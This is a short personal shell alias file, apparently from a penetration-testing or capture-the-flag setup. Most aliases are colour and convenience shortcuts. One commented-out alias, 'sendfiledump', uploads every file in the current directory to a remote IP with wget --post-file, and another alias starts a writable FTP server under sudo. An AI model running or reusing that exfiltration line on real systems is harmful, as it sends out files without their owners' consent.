# aliases
alias ll='ls -ltr --color=auto'
alias ls='ls --color=auto'
alias grep='grep --color=auto'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias pacman='pacman --color=auto'
alias yay='yay --color=auto'
alias update='yay -Syu --noconfirm'
alias ss='ss -puta'
alias nmap='grc nmap'
alias pyftp='sudo python -m pyftpdlib -p 8080 -w'
alias docker='sudo docker'
# alias postfiledumphere='docker run --rm -it -p80:3000 -v "${PWD}:/data" rflathers/filedump'
# alias sendfiledump='ls | xargs -I{} wget http://10.10.14.3/{} --post-file {}'
